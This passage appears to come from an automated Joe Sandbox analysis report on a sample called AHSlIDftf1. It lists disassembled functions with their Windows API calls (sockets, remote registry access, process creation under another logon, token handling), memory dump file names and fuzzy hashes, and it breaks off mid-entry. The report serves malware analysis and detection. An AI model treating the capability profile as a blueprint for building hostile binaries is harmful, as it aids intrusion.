                                                                                                            • __allrem.LIBCMT ref: 00D800BA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D800D6
                                                                                                            • __allrem.LIBCMT ref: 00D800ED
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D8010B
                                                                                                            • __allrem.LIBCMT ref: 00D80122
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D80140
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction ID: 1d55790ed87d7fc4268450c26ff2f752939ca319dd14f20b3e176d85012dd1f6
                                                                                                            • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction Fuzzy Hash: 5881E6766007069FE720AF68CC41B6AB7E9EF41734F28853AF555D6281EB70D9048BB0
                                                                                                            Function 00DD1D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DD3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00DD101C,00000000,?,?,00000000), ref: 00DD3195
                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DD1DC0
                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DD1DE1
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1DF2
                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00DD1E8C
                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00DD1EDB
                                                                                                            • _strlen.LIBCMT ref: 00DD1F35
                                                                                                              • Part of subcall function 00DB39E8: _strlen.LIBCMT ref: 00DB39F2
                                                                                                              • Part of subcall function 00D56D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00D6CF58,?,?,?), ref: 00D56DBA
                                                                                                              • Part of subcall function 00D56D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00D6CF58,?,?,?), ref: 00D56DED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1923757996-0
                                                                                                            • Opcode ID: d0632857c81e7e4d2a9706e0c8842f8bd6e80f974e40e9b2931865269c769b33
                                                                                                            • Instruction ID: 5190e6446e30402c794598193347099465c04215c15e41e2c15ce12a48fa23c1
                                                                                                            • Opcode Fuzzy Hash: d0632857c81e7e4d2a9706e0c8842f8bd6e80f974e40e9b2931865269c769b33
                                                                                                            • Instruction Fuzzy Hash: 7DA19035604340AFC724DF24C895E2ABBA5EF84318F58494DF8565B3A2DB31ED46CBB1
                                                                                                            Function 00D861FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D782D9,00D782D9,?,?,?,00D8644F,00000001,00000001,8BE85006), ref: 00D86258
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8644F,00000001,00000001,8BE85006,?,?,?), ref: 00D862DE
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D863D8
                                                                                                            • __freea.LIBCMT ref: 00D863E5
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            • __freea.LIBCMT ref: 00D863EE
                                                                                                            • __freea.LIBCMT ref: 00D86413
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1414292761-0
                                                                                                            • Opcode ID: 6b586866f7091c967702e5322f95a5b25cc2a309b1ce13d7a2094d067d74b4e1
                                                                                                            • Instruction ID: 64eb7785d345388dfc3f44ee98af13390d49faa87220879d1692ae5eefd5c400
                                                                                                            • Opcode Fuzzy Hash: 6b586866f7091c967702e5322f95a5b25cc2a309b1ce13d7a2094d067d74b4e1
                                                                                                            • Instruction Fuzzy Hash: 9451B172600216ABEB25AF64DC81EBF77AAEB44B60F1D4669FC05D6140EB34DC54C770
                                                                                                            Function 00DDBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDBCCA
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDBD25
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDBD6A
                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DDBD99
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DDBDF3
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDBDFF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1120388591-0
                                                                                                            • Opcode ID: 3be646b4555baa7d79a7be60b7b6e7d8731f07f400b6f9cebb8d1679f62f4bdc
                                                                                                            • Instruction ID: 48e6494dfcdbba07f3badee41bda5920edd467abf63549df4fbaec38d72a80d2
                                                                                                            • Opcode Fuzzy Hash: 3be646b4555baa7d79a7be60b7b6e7d8731f07f400b6f9cebb8d1679f62f4bdc
                                                                                                            • Instruction Fuzzy Hash: AD816E30118241EFD714DF24C895E2ABBE5FF84318F15495EF8968B2A2DB31ED45CBA2
                                                                                                            Function 00DAF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00DAF7B9
                                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 00DAF860
                                                                                                            • VariantCopy.OLEAUT32(00DAFA64,00000000), ref: 00DAF889
                                                                                                            • VariantClear.OLEAUT32(00DAFA64), ref: 00DAF8AD
                                                                                                            • VariantCopy.OLEAUT32(00DAFA64,00000000), ref: 00DAF8B1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DAF8BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859894641-0
                                                                                                            • Opcode ID: 7fb3373eda2f57db403dd5c976eb1cd5cc9555fba2915eea3607d5893761ad7a
                                                                                                            • Instruction ID: 2e359096ef1e8296f2bdaeee60ead2d3d05aad763a5bdaf61dcf3fbe77e67b3d
                                                                                                            • Opcode Fuzzy Hash: 7fb3373eda2f57db403dd5c976eb1cd5cc9555fba2915eea3607d5893761ad7a
                                                                                                            • Instruction Fuzzy Hash: 9051B632500310ABCF24ABA5D895B2EB3A4EF46310F2458A6EC05DF291DB74DC41CBB6
                                                                                                            Function 00DC910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00DC94E5
                                                                                                            • _wcslen.LIBCMT ref: 00DC9506
                                                                                                            • _wcslen.LIBCMT ref: 00DC952D
                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00DC9585
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                            • String ID: X
                                                                                                            • API String ID: 83654149-3081909835
                                                                                                            • Opcode ID: d806cca67698ba20946dfb920585caa3318c0b41ef0f9eca5a6b59e79edc4cbf
                                                                                                            • Instruction ID: 44c9d4535e5495af856743e89d1dbb90d65a28fa57b24fb11cd46127feea7167
                                                                                                            • Opcode Fuzzy Hash: d806cca67698ba20946dfb920585caa3318c0b41ef0f9eca5a6b59e79edc4cbf
                                                                                                            • Instruction Fuzzy Hash: 20E16C315083418FDB14DF24C895B6AB7E4FF85314F18896DE8999B2A2EB31DD05CBB2
                                                                                                            Function 00D6920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00D69241
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00D692A5
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00D692C2
                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D692D3
                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00D69321
                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DA71EA
                                                                                                              • Part of subcall function 00D69339: BeginPath.GDI32(00000000), ref: 00D69357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                            • String ID:
                                                                                                            • API String ID: 3050599898-0
                                                                                                            • Opcode ID: bbe59637f746425fee1ac5dd658619885684867f41f99c0407612337f1475b47
                                                                                                            • Instruction ID: edbddc9e2ef42afc3db044b45da36b69593c46ac179b914657322c90de38a24e
                                                                                                            • Opcode Fuzzy Hash: bbe59637f746425fee1ac5dd658619885684867f41f99c0407612337f1475b47
                                                                                                            • Instruction Fuzzy Hash: C041AE70104340AFD721DF25DCA4FAABBA8EB9A320F040669F995DB2A1C7309946DB71
                                                                                                            Function 00DC07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DC080C
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DC0847
                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00DC0863
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00DC08DC
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DC08F3
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DC0921
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 3368777196-0
                                                                                                            • Opcode ID: ad271890c36c8fe679660728edd0bc54509651c12d72a354d275eca38f021c0b
                                                                                                            • Instruction ID: 4d988c9a1988c00d5c68bbe57751b524c2bd2938a23b60a57660fdb30e142364
                                                                                                            • Opcode Fuzzy Hash: ad271890c36c8fe679660728edd0bc54509651c12d72a354d275eca38f021c0b
                                                                                                            • Instruction Fuzzy Hash: 1B413871900205EBDF14AF54DC85AAA7BB8FF04310B1480A9E904AF297DB31DE65DBB4
                                                                                                            Function 00DE81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DAF3AB,00000000,?,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DE824C
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00DE8272
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DE82D1
                                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 00DE82E5
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 00DE830B
                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DE832F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 642888154-0
                                                                                                            • Opcode ID: 9b919538a6bae4043748f840f96a556a0b8cc2d1405cf964b13dad4fb58c1ed4
                                                                                                            • Instruction ID: 825fc59928a8278142d85e39dfb993634088070825b7c4cf6d213f509f809ad0
                                                                                                            • Opcode Fuzzy Hash: 9b919538a6bae4043748f840f96a556a0b8cc2d1405cf964b13dad4fb58c1ed4
                                                                                                            • Instruction Fuzzy Hash: A241D730601680AFDB25EF16C895BE47BE0FB46715F1C11A8E60C9F272C7325846DB74
                                                                                                            Function 00DB4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00DB4C95
                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DB4CB2
                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DB4CEA
                                                                                                            • _wcslen.LIBCMT ref: 00DB4D08
                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DB4D10
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00DB4D1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                            • String ID:
                                                                                                            • API String ID: 72514467-0
                                                                                                            • Opcode ID: df99513bad384227cabf2bafd92b00d45633ba1a19558d8d48850058ffcd7267
                                                                                                            • Instruction ID: c310a953810a0b85fc78940a775383c05f50ad105b238d6283557fb8d43d7f19
                                                                                                            • Opcode Fuzzy Hash: df99513bad384227cabf2bafd92b00d45633ba1a19558d8d48850058ffcd7267
                                                                                                            • Instruction Fuzzy Hash: 8D21CC72604240BBEB159B35EC45EBB7FACDF45750F14802DF80ACA193EA61DC4196B0
                                                                                                            Function 00DC581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
                                                                                                            • _wcslen.LIBCMT ref: 00DC587B
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DC5995
                                                                                                            • CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC59AE
                                                                                                            • CoUninitialize.OLE32 ref: 00DC59CC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 3172280962-24824748
                                                                                                            • Opcode ID: cd50a6a33cb2ea7675c03b47444924566ca7d003c79b519bdd6c51affb8ed04c
                                                                                                            • Instruction ID: d37861dc72a40697bad76cd1894dc628f9d5d80da316113b522dd0fe2cb37088
                                                                                                            • Opcode Fuzzy Hash: cd50a6a33cb2ea7675c03b47444924566ca7d003c79b519bdd6c51affb8ed04c
                                                                                                            • Instruction Fuzzy Hash: 03D155756047029FCB14DF14D480E2ABBE2EF89714F14899DF8899B361DB31ED85CBA2
                                                                                                            Function 00DB175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DB0FCA
                                                                                                              • Part of subcall function 00DB0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DB0FD6
                                                                                                              • Part of subcall function 00DB0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DB0FE5
                                                                                                              • Part of subcall function 00DB0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DB0FEC
                                                                                                              • Part of subcall function 00DB0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DB1002
                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00DB1335), ref: 00DB17AE
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DB17BA
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00DB17C1
                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DB17DA
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00DB1335), ref: 00DB17EE
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB17F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                            • String ID:
                                                                                                            • API String ID: 3008561057-0
                                                                                                            • Opcode ID: 0ab814228c6f585150b7de7d45a260898d654958581c4feed0c02501ea22ee49
                                                                                                            • Instruction ID: e71ab966bfea2f59b4d89bd4095f148d68cf5fec1b93c9759020673a7ef8e3d8
                                                                                                            • Opcode Fuzzy Hash: 0ab814228c6f585150b7de7d45a260898d654958581c4feed0c02501ea22ee49
                                                                                                            • Instruction Fuzzy Hash: C5116A36A10305EBDB10AFA4CC99BEE7BA9FB46355F944018F882DB210DB35A945CB70
                                                                                                            Function 00DB14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DB14FF
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00DB1506
                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00DB1515
                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00DB1520
                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DB154F
                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00DB1563
                                                                                                            Memory Dump Source
